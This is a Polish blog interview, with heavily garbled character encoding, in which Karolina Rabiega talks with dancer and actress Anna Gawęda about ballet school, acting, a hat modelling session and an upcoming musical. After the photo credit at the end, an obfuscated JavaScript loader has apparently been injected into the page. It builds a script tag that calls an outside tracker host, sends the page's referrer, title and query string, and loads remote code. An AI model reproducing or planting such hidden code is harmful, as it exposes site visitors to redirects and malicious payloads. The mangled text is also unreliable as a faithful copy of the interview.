Anna GawA�da, aktorka, tancerka, fotomodelka.

opublikowane w Najnowsze Wpisy, Psychologia | 0

esklep02


Anna GawA�da tancerka

Karolina Rabiega: Jak rozpoczA�A�aA� swojA� przygodA� z taA�cem?A�Anna GawA�da: OdkA�d pamiA�tam lubiA�am siA� ruszaA�, byA�am bardzo energicznym dzieckiem, w dodatku wygimnastykowanym. Rodzice, widzA�c moje predyspozycje zapytali czy chcA� uczA�szczaA� na ognisko baletowe. I tak wszystko siA� zaczA�A�o. Nauczycielka z ogniska stwierdziA�a, A?e jestem zdolna i powinnam pA?jA�A� do szkoA�y baletowej A?eby tego nie zaprzepaA�ciA�. W zwiA�zku z tym, A?e mieszkam daleko, wiedziaA�am, A?e bA�dA� musiaA�a przebywaA� w internacie. Rodzice byli temu przeciwni. WiedzA�c, A?e jestem bardzo zA?yta z rodzinA�, martwili siA�, A?e nie poradzA� sobie psychicznie. Ale ja tego bardzo chciaA�am, to byA�o moje marzenie. Ognisko zaszczepiA�o we mnie miA�oA�A� do baletu. Nie myA�laA�am o tym, A?e nie bA�dA� mieszkaA� daleko od domu, A?yA�am tylko tym, A?e wszA�dzie bA�dA� otaczaA� siA� baletem. I staA�o siA� tak jak chciaA�am a�� zostaA�am uczennicA� szkoA�y baletowej, a rodzice bardzo mnie wspierali. Jestem im bardzo wdziA�czna, A?e pomogli mi zrealizowaA� swoje marzenia. OniA� zawsze mnie wspierali i sA� moimi najlepszymi przyjaciA?A�mi.

KR:A�Jak wspominasz szkoA�A� baletowA�?

Anna GawA�da: RA?A?nie, i dobrze i A?le. CaA�y ten cykl jest dla mnie bardzo waA?ny w A?yciu. SzkoA�a uksztaA�towaA�a mnie psychicznie. NauczyA�a mnie ogromnej wraA?liwoA�ci, choA� ja juA? i tak z natury jestem wraA?liwa. OprA?cz tego wyrobiA�a we mnie determinacjA�, pracowitoA�A�, perfekcjonizm oraz wytrwaA�oA�A�. Jestem taka, A?e kiedy coA� mi nie wychodziA�o w szkole, siedziaA�am tak dA�ugo na sali, aA? mi wyszA�o. Nie potrafiA�am nigdy odpuA�ciA�. Nawet kiedy mi siA� nie chciaA�o, stawaA�am przy drA�A?ku i wiedziaA�am, A?e muszA�a�� Zawsze byA�am jednA� z lepszych, nie potrafiA�am byA� gorsza od kogoA� – to mnie bardzo denerwowaA�o. Do dziA� nieustannie muszA� czuA� rywalizacjA� w A?yciu. LubiA� czuA�, A?e jest ktoA� dobry z kim mogA� siA� A�cigaA�, porA?wnywaA�. Do tej pory nie potrafiA� z tego zrezygnowaA�. To jest i dobre, i zA�e, ale dziA�ki temu czA�owiek podwyA?sza sobie poprzeczkA�.

KR:A�Jednak po szkole baletowej nie poszA�aA� taA�czyA�. WybraA�aA� szkoA�A� aktorskA�. SkA�d taki pomysA�?

AG: Po szkole byA�am na kilku audycjach do teatrA?w, przez pierwszy rok taA�czyA�am w Operze WrocA�awskiej, ale na wolontariacie.A� Zawsze chciaA�am byA� w balecie. Ale po szkole chyba przyszedA� taki bunta�� PoczuA�am, jakbym wyszA�a z getta. W szkole nie miaA�am normalnego A?ycia. Przez caA�e 9 lat A?yA�am tylko baletem, nie istniaA�o dla mnie A?ycie prywatne. Nie przeA?yA�am tego etapu zabaw, wyjA�cia z chA�opakamia�� Za czasA?w szkoA�y nigdy nie pojawiA�a siA� u mnie myA�l: a�zpA?jdA� sobie na randkA�a�?. Nawet, kiedy po ukoA�czeniu szkoA�y poszA�am z bratem i jego kolegami do klubu, nie potrafiA�am znaleA?A� innych tematA?w do rozmA?w jak tylko balet. PotrafiA�am myA�leA� tylko o tym.

KR:A�Sama jestem absolwentkA� szkoA�y baletowej, wiA�c rozumiem to doskonale.A�A�Zawsze mA?wiA� o sobie, A?e mam spaczonA� psychikA� przez balet…

AG: DokA�adnie! Ja teA? tak zawsze mA?wiA� o sobie.A�Asrodowisko, w ktA?rym siA� obracaA�am, jest jednak bardzo hermetyczne. Dopiero pA?A?niej, kiedy zaczA�A�am otwieraA� siA� na nowych ludzi i inne tematy, zaczA�A�am uczyA� siA� czegoA� nowego… ZobaczyA�am, A?e to jest wartoA�ciowe i rozwijajA�ce – dawaA� sobie i A�innym ludziom szansA�, poznawaA� coA� caA�kiem odrA�bnego niA? tylko balet. Dlatego, kiedy przeprowadziA�am A�siA� do WrocA�awia, a w Operze WrocA�awskiej nie wychodziA�o mi tak, jak chciaA�am, zaczA�A�am szukaA� alternatyw. ZajmowaA�am siA� zupeA�nie innymi rzeczami np. pracowaA�am w sklepie z ubraniami, A?eby sobie dorobiA�. Jednak mA�czyA�am siA� bardzo, bo 9 lat w szkole baletowej to jest za duA?o, A?ebym potrafiA�a sobie wyobraziA� pracA� gdzieA� indzieja�� CaA�y czas myA�laA�am: a�zco ja zrobiA�, jeA�li nie bA�dA� pracowaA� w tym fachu?a�?

Anna GawA�da aktorka

KR:A�I wtedy przyszedA� pomysA� na aktorstwo?

Anna GawA�da: Aktorstwoa�� JuA? kiedy byA�am w szkole lubiA�am graA�, naA�ladowaA� rA?A?ne postaci. Jak byA�am maA�ym dzieckiem, robiA�am swA?j serial, wymyA�laA�am scenariusze. LubiA�am siA� przebieraA�, robiA�am wywiady z lalkami czy z siostrA�, urzA�dzaA�am pokazy. I zawsze byA�am w tym dobra. PamiA�tam, jak kiedyA� do szkoA�y przyjechali aktorzy, ktA?rzy wystawiali dla nas spektakl. Pokazywali nam rA?A?ne zadania aktorskie, a my jako uczniowie prA?bowaliA�my naA�ladowaA� mistrzA?w. UsA�yszaA�am wtedy od nich, A?e jestem bardzo wszechstronna, potrafiA� przeistaczaA� siA� w inne postacie. Aktorstwo od poczA�tku bardzo mi siA�A�podobaA�o,A� ale ukierunkowaA�am siA� w stronA� baletu i to mnie trzymaA�o – balet byA� waA?niejszy. Natomiast kiedy nieA�wychodziA�o mi we WrocA�awiu, zaczA�A�am czA�sto chodziA� do teatru, oglA�daA� spektakle komediowe, dramatyczne czy wspA?A�czesne. PoszerzaA�am w ten sposA?b swojA� wiedzA�. Zawsze interesowaA�y mnie musicale, to jest poA�A�czenie taA�ca z muzykA�, z grA�, ze A�piewem. Kiedy zobaczyA�am pierwszy raz musical „Singin’ in the Rain”, to stwierdziA�am: a�zwow, to jest coA�, co najbardziej mnie krA�ci!a�?. Czyli niekoniecznie stricte balet, ale taniec w poA�A�czeniu ze A�piewem, z grA�a��A�PA?A?niej startowaA�am do paA�stwowych szkA?A� teatralnych. Nie dostaA�am siA�. UdaA�o mi siA� za trzecim razem dostaA� do prywatnej szkoA�y.

KR:A�Czy twoje umiejA�tnoA�ci taneczne pomagajA� Ci w aktorstwie?

AG: Taniec pomA?gA� mi w tym, A?e A�atwiej wchodziA�o mi siA� w role, bo caA�e ciaA�o graA�o. Po tylu latach taA�ca A�wiadomoA�A� ciaA�a jest zupeA�nie inna i pod tym wzglA�dem tancerzom jest A�atwiej. Jednak z drugiej strony, A?eby graA� inne postacie, trzeba caA�kowicie wyzbyA� siA� swoich przyzwyczajeA� nabytych w szkole baletowej.

Anna GawA�da fotomodelka

KR:A�Jak siA� czuA�aA� jako fotomodelka w kapeluszach „Porthosa”? Czy interesuje CiA� takA?e ten kierunek aktywnoA�ci?

Anna GawA�da: A�CzuA�am siA� bardzo dobrze, cieszA� siA�, A?e mogA�am wzbogaciA� siA� o noweA�artystyczne i zawodowe doA�wiadczenie. Po pierwsze miaA�am okazjA� byA� w niezwykA�ym miejscu.A�Kiedy weszA�am do siedziby byA�am pod ogromnym wraA?eniem tego magicznego miejsca. ZobaczyA�am tyle przerA?A?nych modeli kapeluszy, poczA�wszy od klasycznych, skoA�czywszy na fikuA�nych, barwnych, ekscentrycznych modelach. MiaA�am ochotA� przymierzyA� je wszystkie. Wiele z nich zdA�A?yA�am zaA�oA?yA�, czuA�am siA� w nich jak prawdziwa dama… SzczegA?lnie jedenA�piA�kny, rA?A?owy kapelusz bardzo zapadA� mi w pamiA�A�. Bardzo siA� cieszyA�am, A?e to wA�aA�nie ja zostaA�am wybrana do tej sesji. A�Zawsze mA?wiono mi, A?e cokolwiek na siebie zaA�oA?A�: czy ubranie, czy nakrycie gA�owy, to wyglA�dam dobrze. UtwierdzaA�o mnie to w przekonaniu, A?e to bA�dzie dobra sesja. Generalnie uwielbiam eksperymentowaA�, przebieraA� siA�, zmieniaA� style (oczywiA�cie na poczet pracy, konwencji zadania, ktA?re mam wykonaA�), dlatego ta sesja byA�a bardzo miA�ym doA�wiadczeniem. Bardzo lubiA� byA� fotografowana, dlatego teA? fotomodeling uwaA?am za jeden z elementA?w mojej pracy – pracy aktora, tancerza, artysty. Bardzo dobrze czuje siA� przed obiektywem, nie tylko sprawia mi to przyjemnoA�A�, ale czujA� i wiem, A?e robiA� to dobrze.

KR:A�Co uwaA?asz za swA?j najwiA�kszy sukces?

AG: Na pewno to, A?e udaA�o mi siA� skoA�czyA� studia. Jestem teA? dumna z tego, A?e zrealizowaA�am swoje marzenia z dzieciA�stwa – zostaA�am aktorkA� i tancerkA�, skoA�czyA�am szkoA�A� baletowA�. UwaA?am, A?e balet jest to najtrudniejsza sztuka. Dumna jestem teA? z tego, A?e dostaA�am siA� do musicalu – cieszA� siA�, A?e bA�dA� robiA� to, co kocham. UwaA?am, A?e nie ma nic lepszego, niA? pracowaA� w swoim zawodzie, a o to nie jest dziA� tak A�atwo. CiA�A?ko pracujA�, bo uwaA?am, A?e praca popA�aca. ChoA� czasem zdarza mi siA� byA� niecierpliwA�. Jestem juA? na tyle pewna swoich umiejA�tnoA�ci, A?e czujA�, A?e mam coA� to zaprezentowania. Tym bardziej, A?e jestem aktorkA� taA�czA�cA�, co jest niewA�tpliwie atutem.

KR:A�A co uwaA?asz za swojA� najwiA�kszA� poraA?kA�?A�

AG: Chyba to, A?e nie dostaA�am siA� do paA�stwowej szkoA�y teatralnej. ChociaA? ja jestem tak wraA?liwa, A?e jak mi coA� nie idzie, to ze wszystkiego potrafiA� zrobiA� poraA?kA�. Dla mnie poraA?kA� jest, kiedy jestem gorsza od kogoA�, np. kiedy nie wygram castingu, na ktA?rym mi zaleA?aA�o.

KR:A�Jakie doA�wiadczenie nauczyA�o CiA� najwiA�cej w A?yciu?

AG: Zdecydowanie szkoA�a baletowa. Jestem dziA�ki niej bardzo obowiA�zkowa, moA?na powiedzieA�, A?eA�jestem przez to pracoholikiem.

KR:A�Czy uwaA?asz, A?e ludzie nie lubiA� osA?b, ktA?re osiA�gnA�A�y sukces?

AG: Tak uwaA?am. Jak ktoA� jest dobry, ma warunki do tego, by osiA�gnA�A� sukces…. ZwA�aszcza w A�rodowisku artystycznym jest ogromna zawiA�A�. Kiedy np. ktoA� wyglA�da lepiej, prezentuje siA� lepiej, to takie osoby siA� tA�umi.

KR:A�SkA�d siA� bierze ta zawiA�A�?

AG: Z kompleksA?w, z niedowartoA�ciowania, z obawy, A?e ktoA� inny moA?e zajA�A� nasze miejsce…

KR:A�Czy jesteA� szczA�A�liwa?

AG: Nie wiem, nie potrafiA� Ci odpowiedzieA� na to pytanie.

KR:A�A czy uwaA?asz, A?e wszystko w A?yciu zaleA?y od nas? JesteA�my kowalami swojego losu?

AG: UwaA?am, A?e wiele zaleA?y od nas, ale czasem jesteA�my poddani czemuA� z zewnA�trz. Czasem sytuacje tak siA� ksztaA�tujA�, A?e nie jesteA�my w stanie nic zrobiA�.

KR:A�GraA�aA� w serialach, reklamach, teledyskach. Gdzie teraz bA�dzie moA?na CiA� zobaczyA�?

AG:A�W listopadzie bA�dzie miaA�a miejsce premiera musicalu a�zInnia�?, w ktA?rym wystA�piA�. Na pewno wystawiany bA�dzie w Warszawie i w teatrze w A?odzi. Niestety na razie nie mogA� zdradzaA� wiA�cej szczegA?A�A?w.

KR:A�Gdzie widzisz siebie za 5, 10 lat?

AG: Mam swoje cele, ktA?re chcA� realizowaA�. Na pewno chcA� speA�niaA� siA� zawodowo, ksztaA�towaA� swA?j warsztat aktorski, byA� czynnA� w swoim zawodzie. Na razie skupiam siA� na musicalu,A� a co bA�dzie za tydzieA�, miesiA�c, czy rok to nie wiema�� MyA�lA�, A?e chciaA�abym zostaA� w Warszawie, bo jest tu najwiA�cej moA?liwoA�ci dla aktorA?w. W szkole teatralnej uczyA� mnie wybitny aktor polskiego kina, profesor Edward Linde Lubaszenko, ktA?remuA�zawdziA�czam wiele, jeA�li chodzi o mojA� drogA� edukacji. PamiA�tam jak na obronie mojej pracy magisterskiej, wypowiadajA�c siA� pochlebnie na mA?j temat, utwierdziA� mnie w przekonaniu, A?e to co robiA� to dobrze obrana przeze mnie A�cieA?ka. To daA�o mi ogromnA� motywacjA� do dalszych dziaA�aA�.

KR: Aniu, w takim razie A?yczA� dalszych sukcesA?w zawodowych, a takA?e prywatnych. Bardzo dziA�kujA� za rozmowA�.

plik1 gawedaFilc tytuA�22e0a7c707308177d45a195d8c029995

Foto: Karolina Rabiega
Modelka: Anna GawA�davar _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}